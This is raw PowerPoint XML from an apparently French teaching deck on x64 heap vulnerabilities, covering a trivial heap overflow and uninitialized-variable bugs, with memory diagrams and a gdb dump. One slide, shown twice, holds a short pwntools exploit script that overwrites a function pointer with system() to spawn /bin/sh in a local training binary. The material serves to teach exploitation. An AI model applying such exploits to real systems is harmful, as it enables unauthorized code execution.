              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776DEFC3-FEFB-4B88-8179-633812053321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Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B4203D-83B4-42F8-84E4-12DF14C72EE1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Flèche : chevron 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE848FF-FA13-48F9-BE30-7C446375AC06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15" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{287B5F34-A210-443D-9156-E3B2DCFF1660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9755872-416E-4817-9243-5F6F64A126ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="835528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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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2000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="2276872"/>
            <a:ext cx="11148226" cy="35283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5400" y="4797152"/>
            <a:ext cx="4032448" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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 : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9508B058-C6F1-45D5-96B4-B5027CEB2BC4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Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD1232D-70A4-4949-9269-623121FB3883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8" name="Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E9C5E0-5255-47E8-959E-3AA4D39B32F7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013296EE-226E-434E-B276-2811943451B8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766D82D7-E62F-4FD1-96D7-CCDCDC378BAA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97911D1D-25B9-4E6F-9B07-B0C603F80A3D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8047058-E75D-4D28-AB0C-C6CE5E829852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3295337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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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2000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="2276872"/>
            <a:ext cx="11148226" cy="352839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267" y="2310287"/>
            <a:ext cx="4325466" cy="3494977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EC3835-490C-4102-8D0B-918BA445847A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lèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82F1861D-C939-40A3-B04B-B21D9E1830A6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7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276F9E3B-F606-461E-8886-20A99675B94C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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C2EC3FE-8A7F-47FF-B867-2A637FA4B2ED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AD2EA9A9-FA19-4558-B4D8-31C58ECCD2D5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DFDD3730-CF76-43CF-ABBF-7CE5A5DABC10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1C0B906-431F-4C4D-AD20-E9D74F2CD211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417106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4E6CCB7-CAF8-45B0-8FBD-7538BC0D3BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3234408" y="3068960"/>
            <a:ext cx="398264" cy="151216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 err="1"/>
              <a:t>prev_size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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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700808"/>
            <a:ext cx="4059036" cy="11314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42728" y="3068960"/>
            <a:ext cx="395536" cy="151216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/>
              <a:t>size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1938264" y="3068960"/>
            <a:ext cx="413320" cy="151216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/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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2352900" y="3068960"/>
            <a:ext cx="881508" cy="151216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AAA…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3647728" y="3068960"/>
            <a:ext cx="432048" cy="151216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/>
              <a:t>size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90492" y="3068960"/>
            <a:ext cx="413320" cy="151216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5128" y="3068960"/>
            <a:ext cx="1294828" cy="151216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/bin/sh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2351584" y="4725144"/>
            <a:ext cx="129614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3647728" y="4725144"/>
            <a:ext cx="43204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2638492" y="481784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0x20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537614" y="4817842"/>
            <a:ext cx="65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0x8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Connecteur droit 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567608" y="2348880"/>
            <a:ext cx="2988894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6271692" y="1700808"/>
            <a:ext cx="58009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$ cat exploit.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>system = 0x7ffff7a79480</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("./main")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p.recvuntil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("4. exit")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.new_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>red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hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.new_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sh","green</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.del_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.new_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("A"*0x28+p64(system)[0:7],"green")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p.interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Flèche droite 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570026" y="3074953"/>
            <a:ext cx="1772686" cy="22546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chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E607B55-F231-41A8-9714-24B7A59301A6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8" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC522D9D-EA58-48BC-A106-A1CD7F59D80E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20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A5A560-BEAD-4E2D-8DE7-E39A3608474F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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09A61C2-697E-4B75-A94F-7172D1E7C206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5" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBF493A-2A02-4FDF-9965-BFF92CC77879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26" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9B329B-6AAC-45CB-9AE1-451494355F62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206D15-1582-4AFD-A414-40B828D0D85B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144464" y="3068960"/>
            <a:ext cx="398264" cy="151216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 err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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F0F6B12-CAEC-435B-9DD7-106D482A4696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2057956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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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700808"/>
            <a:ext cx="4059036" cy="11314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42728" y="3068960"/>
            <a:ext cx="395536" cy="151216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/>
              <a:t>size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1938264" y="3068960"/>
            <a:ext cx="413320" cy="151216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/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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2352900" y="3068960"/>
            <a:ext cx="1294828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AAAAA…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3647728" y="3068960"/>
            <a:ext cx="432048" cy="151216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/>
              <a:t>size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90492" y="3068960"/>
            <a:ext cx="413320" cy="151216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5128" y="3068960"/>
            <a:ext cx="1294828" cy="151216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/bin/sh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2351584" y="4725144"/>
            <a:ext cx="129614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3647728" y="4725144"/>
            <a:ext cx="43204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2638492" y="481784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0x20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537614" y="4817842"/>
            <a:ext cx="65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0x8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Connecteur droit 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567608" y="2348880"/>
            <a:ext cx="2988894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6271692" y="1700808"/>
            <a:ext cx="58009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$ cat exploit.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>system = 0x7ffff7a79480</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("./main")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p.recvuntil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("4. exit")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.new_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>red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hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.new_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sh","green</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.del_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>w.new_hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>("A"*0x28+p64(system)[0:7],"green")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p.interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>()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036" y="5226098"/>
            <a:ext cx="7357516" cy="1496028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B24C4E-7D94-4AE5-AACD-86E4EFC274A4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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D33A3BA8-FF42-41CA-A9FC-8D89A8945EA2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25" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E9A106-76AA-43CA-9258-C29781972654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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E41EEA9B-7489-4D4B-8F33-C45C2C0F4C06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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02553FE-9C5A-4AFA-B4E1-C150D089905F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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E532600-BE86-4C2F-BEF5-32A159576B5F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4A7767-6650-41A5-B5BC-B0B9C328EA1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3234408" y="3068960"/>
            <a:ext cx="398264" cy="151216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 err="1"/>
              <a:t>prev_size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7C0EB95-A0CB-4D11-918A-AFA6647348C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352900" y="3068960"/>
            <a:ext cx="881508" cy="151216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AAA…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2552ED-BB08-4A4D-8188-BBAFD8975B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144464" y="3068960"/>
            <a:ext cx="398264" cy="151216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 err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Flèche droite 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570026" y="3074953"/>
            <a:ext cx="1772686" cy="22546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143125"/>
            <a:ext cx="4572000" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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F86EA195-897C-4E24-8A7D-2E9B61BE312B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425974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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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free n'efface pas le contenu du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> alloué</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> n'efface pas le contenu du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> alloué avant son utilisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>solution : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>calloc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" t="9051" r="83075" b="72049"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="407368" y="3356992"/>
            <a:ext cx="4640516" cy="288032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1127448" y="5157192"/>
            <a:ext cx="144016" cy="154081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1127448" y="5445224"/>
            <a:ext cx="144016" cy="14401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047884" y="2996952"/>
            <a:ext cx="71441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gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/10xw 0x56558008  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558008:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
